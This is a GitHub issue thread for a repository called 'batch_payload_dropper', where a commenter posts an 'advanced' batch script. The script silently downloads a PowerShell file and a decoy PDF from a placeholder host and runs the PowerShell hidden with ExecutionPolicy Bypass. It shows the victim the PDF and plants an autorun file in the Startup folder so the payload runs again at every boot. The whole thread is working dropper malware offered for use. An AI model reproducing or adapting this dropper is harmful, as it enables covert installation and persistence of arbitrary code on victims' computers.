search

iamh4dez / batch_payload_dropper

This script sets up an autorun mechanism to execute the downloaded PowerShell script silently on system startup and also opens a PDF file for the user to view.
3 stars 1 forks source link

issue here #2

Open Sayyed090 opened 1 year ago

Sayyed090 commented 1 year ago

when i run bat file from local disk d it creates run.vbs (expected in temp) and autorun.bat(startup folder) file in same directory.

Sayyed090 commented 1 year ago

made some modifications (adavanced script) 👍 :

@echo off :: Download script.ps1 and readme.pdf from the specified URLs silently powershell -Command "(New-Object Net.WebClient).DownloadFile('http://www.xxx.com/hello.ps1', '%TEMP%\script.ps1')" powershell -Command "(New-Object Net.WebClient).DownloadFile('https://www.xxx.com/Readme.pdf', '%TEMP%\readme.pdf')"

:: Create run.vbs to execute script.ps1 and open readme.pdf with a 3-second delay in a maximized window echo Set objShell = CreateObject("WScript.Shell") > "%temp%\run.vbs" echo objShell.Run "powershell.exe -ExecutionPolicy Bypass -File %temp%\script.ps1", 0, True >> "%temp%\run.vbs" echo WScript.Sleep 3000 >> "%temp%\run.vbs" echo objShell.Run "%temp%\readme.pdf", 3, False >> "%temp%\run.vbs"

:: Executing run.vbs in minimized window start /min "" "%TEMP%\run.vbs"

:: Create autorun.bat in the startup folder to execute run.vbs on every system startup. echo @echo off > "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\autorun.bat" echo start /min "" "%TEMP%\run.vbs" >> "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\autorun.bat"